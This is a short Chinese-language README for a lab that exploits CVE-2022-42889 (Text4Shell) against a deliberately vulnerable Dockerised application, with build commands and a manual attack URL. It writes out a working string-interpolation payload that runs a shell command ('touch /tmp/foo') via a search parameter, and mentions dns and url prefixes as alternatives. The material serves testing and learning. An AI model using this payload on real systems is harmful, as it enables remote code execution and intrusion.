
CVE-2022-42889(Text4Shell)的自动化漏洞利用,附带易受攻击的 Docker 化应用程序,用于测试和手动利用指南。
//自动黑客入侵: 1../install.sh
2../exploit.sh
3.To remove the application use ./stopapp.sh
//手动黑客入侵:
mvn clean install
docker build --tag=text4shell .
docker run -p 80:8080 text4shell
http://localhost/text4shell/attack?search=<anything>
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
您也可以尝试使用 dns 或 url 前缀。
获取容器ID
docker container ls
docker exec -it <container_id> bash
/tmp 目录下看到名为 foo 的文件被创建):ls /tmp/
docker container stop <container_id>